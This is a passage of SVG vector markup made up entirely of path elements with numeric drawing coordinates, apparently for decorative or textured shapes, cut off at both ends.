2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path 